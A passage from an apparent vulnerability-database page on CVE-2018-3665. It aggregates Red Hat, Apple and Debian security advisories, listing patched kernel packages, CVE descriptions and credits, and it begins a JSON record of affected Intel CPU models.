i386: kernel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-devel-2.6.32-754.2.1.el6.i686.rpm kernel-headers-2.6.32-754.2.1.el6.i686.rpm perf-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm kernel-doc-2.6.32-754.2.1.el6.noarch.rpm kernel-firmware-2.6.32-754.2.1.el6.noarch.rpm

x86_64: kernel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm kernel-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-headers-2.6.32-754.2.1.el6.x86_64.rpm perf-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-754.2.1.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm kernel-doc-2.6.32-754.2.1.el6.noarch.rpm kernel-firmware-2.6.32-754.2.1.el6.noarch.rpm

x86_64: kernel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm kernel-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-headers-2.6.32-754.2.1.el6.x86_64.rpm perf-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-754.2.1.el6.src.rpm

i386: kernel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-devel-2.6.32-754.2.1.el6.i686.rpm kernel-headers-2.6.32-754.2.1.el6.i686.rpm perf-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm kernel-doc-2.6.32-754.2.1.el6.noarch.rpm kernel-firmware-2.6.32-754.2.1.el6.noarch.rpm

ppc64: kernel-2.6.32-754.2.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-754.2.1.el6.ppc64.rpm kernel-debug-2.6.32-754.2.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-754.2.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-754.2.1.el6.ppc64.rpm kernel-devel-2.6.32-754.2.1.el6.ppc64.rpm kernel-headers-2.6.32-754.2.1.el6.ppc64.rpm perf-2.6.32-754.2.1.el6.ppc64.rpm perf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm

s390x: kernel-2.6.32-754.2.1.el6.s390x.rpm kernel-debug-2.6.32-754.2.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.s390x.rpm kernel-debug-devel-2.6.32-754.2.1.el6.s390x.rpm kernel-debuginfo-2.6.32-754.2.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-754.2.1.el6.s390x.rpm kernel-devel-2.6.32-754.2.1.el6.s390x.rpm kernel-headers-2.6.32-754.2.1.el6.s390x.rpm kernel-kdump-2.6.32-754.2.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-754.2.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-754.2.1.el6.s390x.rpm perf-2.6.32-754.2.1.el6.s390x.rpm perf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm

x86_64: kernel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm kernel-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-headers-2.6.32-754.2.1.el6.x86_64.rpm perf-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-754.2.1.el6.ppc64.rpm perf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm python-perf-2.6.32-754.2.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-754.2.1.el6.s390x.rpm kernel-debuginfo-2.6.32-754.2.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-754.2.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-754.2.1.el6.s390x.rpm perf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm python-perf-2.6.32-754.2.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-754.2.1.el6.src.rpm

i386: kernel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-devel-2.6.32-754.2.1.el6.i686.rpm kernel-headers-2.6.32-754.2.1.el6.i686.rpm perf-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm kernel-doc-2.6.32-754.2.1.el6.noarch.rpm kernel-firmware-2.6.32-754.2.1.el6.noarch.rpm

x86_64: kernel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm kernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm kernel-devel-2.6.32-754.2.1.el6.x86_64.rpm kernel-headers-2.6.32-754.2.1.el6.x86_64.rpm perf-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm python-perf-2.6.32-754.2.1.el6.i686.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm python-perf-2.6.32-754.2.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2018-3639 https://access.redhat.com/security/cve/CVE-2018-3665 https://access.redhat.com/security/cve/CVE-2018-10675 https://access.redhat.com/security/cve/CVE-2018-10872 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBW0TykdzjgjWX9erEAQj7nQ/8DBiN11jNNGxND1Io2xuiZ+/RqzFz4IXv VMTrhukotRz5vbQWziRcHl0DVUttBBbwzdoNUu4RH4rxHv0J0GTLYusgyWlyDJP8 D229CT7o6lK4RjPryXFsu/4YsIzu8Vz35KB8SpW6gUkXibANrCWDEHEqc9+6mQ6g VFe0wAu1Tw3PKre0zK+XL/uxkvjk8ZeDINe8WVUDloBOnxFMnZZjEcZsIO9JfjBr krlU1QTQcPeKsrv6gofNXBOeQn0JZS1BVDy0JiNoOihJqPPBLA5RkyZzWouy6FDt xVTN7BEuILTUszfcygXA17OdNUzJm/L6a4rFXno4+eN5u5Ucx46/abXhWhRzcwvV +7IuGNs83aTZufXNbWDtiGFkIyKE5NyX7U7SOoxz42AxesSxJ6SKJFD4iBu/0YrU h9BvuHkkVNu+NsYT6rajqwz5ytkEbCJAX7xvNnu7Wi18tWKEWklqAFYSqVnpopO2 8xSW2+OTSkAQ9uiGAz9aTLLca2Zi/I8kjAcNyv4tASUcvodNzUE/OuERC5hvOZ6X 6j/POh7W7xA3cAg216EEj4X12BIwArqt8hjZ6hO5cd7ZfnWof7BVEjLnqtyJjhzi Xap6Pf/NG4/iSO1kEFLo3Uw9sQVoPRU4Hg1KXJJy+XboBQ3/K9ctCU5qvTRApmmM OjBeir/Q654=I9wq -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

APPLE-SA-2018-7-23-1 Additional information for APPLE-SA-2018-7-9-4 macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan

macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, and Security Update 2018-004 El Capitan address the following:

AMD Available for: macOS High Sierra 10.13.5 Impact: A malicious application may be able to determine kernel memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2018-4289: shrek_wzw of Qihoo 360 Nirvan Team

APFS Available for: macOS High Sierra 10.13.5 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4268: Mac working with Trend Micro's Zero Day Initiative

ATS Available for: macOS High Sierra 10.13.5 Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4285: Mohamed Ghannam (@_simo36)

Bluetooth Available for: MacBook Pro (15-inch, 2018), and MacBook Pro (13-inch, 2018, Four Thunderbolt 3 Ports) Other Mac models were addressed with macOS High Sierra 10.13.5. Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. CVE-2018-5383: Lior Neumann and Eli Biham Entry added July 23, 2018

CFNetwork Available for: macOS High Sierra 10.13.5 Impact: Cookies may unexpectedly persist in Safari Description: A cookie management issue was addressed with improved checks. CVE-2018-4293: an anonymous researcher

CoreCrypto Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6 Impact: A malicious application may be able to break out of its sandbox Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4269: Abraham Masri (@cheesecakeufo)

DesktopServices Available for: macOS Sierra 10.12.6 Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed with improved permission validation. CVE-2018-4178: Arjen Hendrikse

IOGraphics Available for: macOS High Sierra 10.13.5 Impact: A local user may be able to read kernel memory Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

An information disclosure issue was addressed with FP/SIMD register state sanitization. CVE-2018-3665: Julian Stecklina of Amazon Germany, Thomas Prescher of Cyberus Technology GmbH (cyberus-technology.de), Zdenek Sojka of SYSGO AG (sysgo.com), and Colin Percival

libxpc Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5 Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4280: Brandon Azad

libxpc Available for: macOS High Sierra 10.13.5 Impact: A malicious application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4248: Brandon Azad

LinkPresentation Available for: macOS High Sierra 10.13.5 Impact: Visiting a malicious website may lead to address bar spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)

Additional recognition

Help Viewer We would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing for their assistance.

Help Viewer We would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing for their assistance.

Help Viewer We would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing for their assistance.

Help Viewer We would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing for their assistance.

Kernel We would like to acknowledge juwei lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative for their assistance.

Security We would like to acknowledge Brad Dahlsten of Iowa State University for their assistance.

Installation note:

macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, and Security Update 2018-004 El Capitan may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEfcwwPWJ3e0Ig26mf8ecVjteJiCYFAltUscgACgkQ8ecVjteJ iCYeUhAApT+4xU8iuXThUb/3bH207ZNLf8NC6eCtaPLP55Dn27hdNZYoQfGZYmY5 jKsGNXAiel02GWQLpsTeNZaWM+Tzeuus41iSFrvBFtoS4SobMYw9ymV1emxBSlY6 ZDV3L47IJOMHeF9HwE260BgIMFJDF9jMGkm22VhLE3U7uQOdIjHgOAmr/reoof4Z 84yNvBVK5/7DYlY4QxHL6bvsQG47FNs2P0WzpkrtLQwPXyz6y7I3VH4wc7G3J5dE 9YanAw/f9d31GH5lrIJLJt+pFtOsqOonHfzgf+mn7THNBIXsr7HHTiycw+6rRBlj m9X2jL3VF25WNyU1Ir13z1Vt//Yksva8JluBFCUAMxFWi9FJhgF64Rscdmuj756u ItMETXK15GSxc8X6Stoge3iMVfajS6nozVX99Pxf1I0XCBQNVNynQLkTL/ZzwJ7X miBAMXywxgzZmSDo4LSs3Xs3dRk7eIPTQ7iY08wX2c5uJYfXs1deFIRaJPxsA0X3 BH2SAL1kpesU0Qk1YZGnPLtja8c4jzvWKx31EI2v0uASiwBMdswu4FL78/dq19AB sqeW4xjmvCK2Yp9IEBp1oo0oTlfBrrl6dbnrwVFC0yBaJBAdCzlsO/oEm0VP5AKO CqPNW3N1JAQIg0hplXq+2gLMXA7SNzxRLh0rTDRQ19mow47fDmk= =Fo0i -----END PGP SIGNATURE----- . 7) - noarch, x86_64

Security Fix(es):

  • A flaw was found in the implementation of the "fill buffer", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. (CVE-2018-12130)

  • Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. (CVE-2018-12126)

  • Microprocessors use a ‘load port’ subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU’s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel.

Bug Fix(es):

  • rwsem in inconsistent state leading system to hung (BZ#1690321)

  • efi_bgrt_init fails to ioremap error during boot (BZ#1692284)

  • Bugs fixed (https://bugzilla.redhat.com/):

1391490 - CVE-2016-8633 kernel: Buffer overflow in firewire driver via crafted incoming packets 1402885 - CVE-2016-7913 kernel: media: use-after-free in [tuner-xc2028] media driver 1474928 - CVE-2017-11600 kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message 1495089 - CVE-2017-12190 kernel: memory leak when merging buffers in SCSI IO vectors 1517220 - CVE-2017-16939 Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation 1520328 - CVE-2017-1000407 Kernel: KVM: DoS via write flood to I/O port 0x80 1525474 - CVE-2017-17558 kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow 1535173 - CVE-2017-13215 kernel: crypto: privilege escalation in skcipher_recvmsg function 1552048 - CVE-2018-1068 kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c 1585011 - CVE-2018-3665 Kernel: FPU state information leakage via lazy FPU restore 1641878 - CVE-2018-18559 kernel: Use-after-free due to race condition in AF_PACKET implementation 1646781 - CVE-2018-12126 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS) 1646784 - CVE-2018-12130 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS) 1667782 - CVE-2018-12127 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS) 1705312 - CVE-2019-11091 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM)

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-4232-1 security@debian.org https://www.debian.org/security/ Moritz Muehlenhoff June 20, 2018 https://www.debian.org/security/faq


Package : xen CVE ID : CVE-2018-3665

This update provides mitigations for the "lazy FPU" vulnerability affecting a range of Intel CPUs, which could result in leaking CPU register states belonging to another vCPU previously scheduled on the same CPU. For additional information please refer to https://xenbits.xen.org/xsa/advisory-267.html

For the stable distribution (stretch), this problem has been fixed in version 4.8.3+xsa267+shim4.10.1+xsa267-1+deb9u8.

We recommend that you upgrade your xen packages

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1505",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "5700eq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "4670k"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "4670"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "4980hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "5775c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "4590t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "5600u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "5700hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "5650u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "5350h"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "11.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "7.1"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "7.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "11.2"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "7.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "7.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "11.1"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "7.4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5287u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5575r"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2550k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2655le"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700mq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2435m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4202y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "875k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7660u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5005u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qe"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4250u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7920hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
